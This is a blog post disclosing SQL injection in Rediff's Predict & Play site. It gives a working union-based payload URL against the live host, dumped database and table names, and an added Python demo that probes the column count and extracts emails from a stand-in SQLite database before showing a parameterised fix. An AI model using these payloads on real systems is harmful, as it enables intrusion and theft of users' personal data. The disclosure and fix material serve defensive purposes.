Rediff’s Predict & Play Portal is Game for SQL Injection [Hack]

It seems hackers have got an easy hold of Rediff’s Predict & Play portal and are able to ‘predict & play’ with the entire database.

Dear Rediff,

It seems hackers have got an easy hold of your Predict & Play portal and are able to ‘predict & play’ with the entire database.

Target: http://predict.rediff.com
Server = Apache
Version = 5.1.30-log
Powered by = PHP/5.1.4
Current User = root@10.50.60.1
Current Database = predictwin
Union Columns = 15
Vuln Url : http://predict.rediff.com/member_profile.php?mem_id=-1+and+1=0+union+Select+UNHEX(HEX([visible])),2,3,4,5,6,7,8,9,10,11,12,13,14,15--

Database:
predictwin, information_schema, Ivsregistrationdb, Ivsserverdb, PREDICTSCRAPBOOK, crbt, db_stats, editorial, eterno, mboard_mod, mobilerediff, moderator, money, moneycomb1, moneycomb2, moneysearch, mysql, mysql_preupgrade_5_0, predictwin, relianceretail, test

Current Database: predictwin
Table:
MemberMaster, Award_CricketPlayer, Award_EventMaster, Award_Group_Master, Award_MailLog, Award_MemberPredictions, Award_PredictionsMaster, Award_TagsMaster, Award_TransactionMaster, CricketPlayer, CricketPlayerStat, CricketPlayerStatWC, CricketPlayerStat_indeng, CricketPlayerWC, CricketPlayer_indeng etc.

The hacker has even got hold of member details [email id / mobile number / city data] and we suggest Rediff plug the hole: the mem_id parameter goes into the query unvalidated, and the UNION above hands back any column of any table the root account can read [just adds to your Monday morning blues].
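As an added example that is not part of the original post or the mailing-list dump, the Python script below replays the union-based technique behind the URL above against an in-memory SQLite database standing in for the MySQL predictwin schema (the 5.1.30-log version string and the information_schema entry in the dump are MySQL's). Everything except the MemberMaster table name is assumed or constructed: the 15-column profile query, its column names, the two sample members, and sqlite_master standing in for information_schema. SQLite has no UNHEX(), so the first UNION column is read back directly; the UNHEX(HEX()) wrapper in the original payload returns the same value as a binary string (commonly used to sidestep MySQL character-set and collation errors) and is not needed here.

```python
"""Replay of a union-based SQL injection in the style of the member_profile.php
URL above. Added example, not Rediff's code; all table contents are constructed."""
import sqlite3

# Constructed sample data standing in for the real MemberMaster table.
SCHEMA = """
CREATE TABLE MemberMaster (
    mem_id INTEGER PRIMARY KEY, nick TEXT, city TEXT, email TEXT, mobile TEXT,
    c6 TEXT, c7 TEXT, c8 TEXT, c9 TEXT, c10 TEXT, c11 TEXT, c12 TEXT, c13 TEXT,
    c14 TEXT, active INTEGER
);
INSERT INTO MemberMaster VALUES
 (1, 'alice', 'Pune',   'alice@example.com', '9800000001', '','','','','','','','','', 1),
 (2, 'bob',   'Mumbai', 'bob@example.com',   '9800000002', '','','','','','','','','', 1);
"""

# Assumed 15-column profile query, matching "Union Columns = 15" in the dump.
PROFILE_COLS = ("mem_id, nick, city, email, mobile, c6, c7, c8, c9, c10, "
                "c11, c12, c13, c14, active")


def connect():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def profile_vulnerable(con, mem_id):
    """Mirrors the broken page: the request parameter is pasted straight into the SQL."""
    sql = f"SELECT {PROFILE_COLS} FROM MemberMaster WHERE mem_id = {mem_id} AND active = 1"
    return con.execute(sql).fetchall()


def profile_fixed(con, mem_id):
    """Same query with the id validated as an integer and bound as a parameter."""
    try:
        mem_id = int(mem_id)
    except (TypeError, ValueError):
        return []                      # not a member id: refuse rather than query
    sql = f"SELECT {PROFILE_COLS} FROM MemberMaster WHERE mem_id = ? AND active = 1"
    return con.execute(sql, (mem_id,)).fetchall()


def union_payload(expr, ncols=15):
    """'-1 and 1=0' empties the legitimate result set so only the UNION row comes
    back; the trailing '--' comments out the rest of the original WHERE clause."""
    filler = ",".join(str(i) for i in range(2, ncols + 1))
    return f"-1 and 1=0 union select {expr},{filler}--"


def find_column_count(con, max_cols=30):
    """How 'Union Columns = 15' is discovered: probe until UNION stops erroring
    about mismatched column counts."""
    for n in range(1, max_cols + 1):
        try:
            profile_vulnerable(con, union_payload("1", n))
            return n
        except sqlite3.OperationalError:
            continue
    return None


def extract(con, expr):
    """Read back the first UNION column, the slot the dump fills with UNHEX(HEX([visible]))."""
    rows = profile_vulnerable(con, union_payload(expr))
    return [r[0] for r in rows]


if __name__ == "__main__":
    db = connect()
    print("columns:", find_column_count(db))
    print("version:", extract(db, "sqlite_version()"))
    print("tables:", extract(db, "(select group_concat(name) from sqlite_master)"))
    print("emails:", extract(db, "(select group_concat(email) from MemberMaster)"))
    print("fixed:", profile_fixed(db, union_payload("sqlite_version()")))
```

The three extract() calls correspond to the version, table list and member e-mail rows in the dump; the same payload through profile_fixed() returns nothing. In PHP 5.1 the equivalent fix is casting `$_GET['mem_id']` to int before it reaches the query, or binding it through a mysqli or PDO prepared statement, and the application should not be connecting as root in the first place.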

[via : Owasp, Pune mailing list]

Recommended Read: Note to Web Programmers – (Security) Hole in the Soul is Dangerous.
